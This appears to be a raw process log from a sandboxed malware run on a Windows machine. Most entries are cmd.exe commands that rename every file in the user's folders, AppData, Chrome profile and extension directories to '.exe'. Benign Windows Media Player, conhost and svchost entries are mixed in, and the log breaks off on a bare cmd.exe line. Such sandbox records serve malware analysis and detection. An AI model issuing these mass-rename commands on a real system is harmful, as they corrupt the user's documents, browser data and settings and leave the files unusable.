"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
C:\Windows\SysWOW64\unregmp2.exe
"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
C:\Windows\system32\unregmp2.exe
"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\.oracle_jre_usage\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\3D Objects\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Application Data\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Contacts\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Cookies\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Desktop\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Documents\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Downloads\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Favorites\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Links\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Local Settings\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Music\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\My Documents\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\NetHood\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\OneDrive\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Pictures\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\PrintHood\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Recent\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Saved Games\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Searches\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\SendTo\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Start Menu\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Templates\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Videos\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Application Data\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Comms\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\History\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\PeerDistRepub\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\PlaceholderTileLogoFolder\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Publishers\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temporary Internet Files\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Acrobat\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Color\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\Cache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\ToolsSearchCacheRdr\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Color\Profiles\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Comms\Unistore\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Comms\UnistoreDB\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Comms\Unistore\data\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Comms\Unistore\data\temp\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\AutofillStates\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\BrowserMetrics\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\CertificateRevocation\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ClientSidePhishing\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\CommerceHeuristics\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crowd Deny\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\DesktopSharingHub\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FileTypePolicies\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FirstPartySetsPreloaded\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\hyphen-data\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\MEIPreload\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\OptimizationHints\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\OriginTrials\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\pnacl\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\PKIMetadata\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\RecoveryImproved\*.*" "*.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SafetyTips\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Subresource Filter\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\UrlParamClassifications\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\WidevineCdm\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ZxcvbnData\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\attachments\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\reports\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\blob_storage\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\*.*" "*.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\coupon_db\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\databases\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\WebStorage\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\blob_storage\5023649e-3474-497a-93ff-f7b353cf8eca\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\*.*" "*.exe"
C:\Windows\SysWOW64\unregmp2.exe
C:\Windows\system32\unregmp2.exe /ShowWMP /SetShowState /CreateMediaLibrary
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\*.*" "*.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\*.*" "*.exe"
C:\Windows\system32\unregmp2.exe
"C:\Windows\SysNative\unregmp2.exe" /ShowWMP /SetShowState /CreateMediaLibrary /REENTRANT
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\*.*" "*.exe"
C:\Program Files (x86)\Windows Media Player\wmplayer.exe
"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Relaunch
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_metadata\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\af\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\am\*.*" "*.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\ar\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\az\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\be\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\bg\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\bn\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\ca\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\cs\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\cy\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\da\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\de\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\el\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\en\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\en_CA\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\en_GB\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\en_US\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\es\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\es_419\*.*" "*.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\et\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\eu\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\fa\*.*" "*.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\fi\*.*" "*.exe"
C:\Windows\System32\cmd.exe
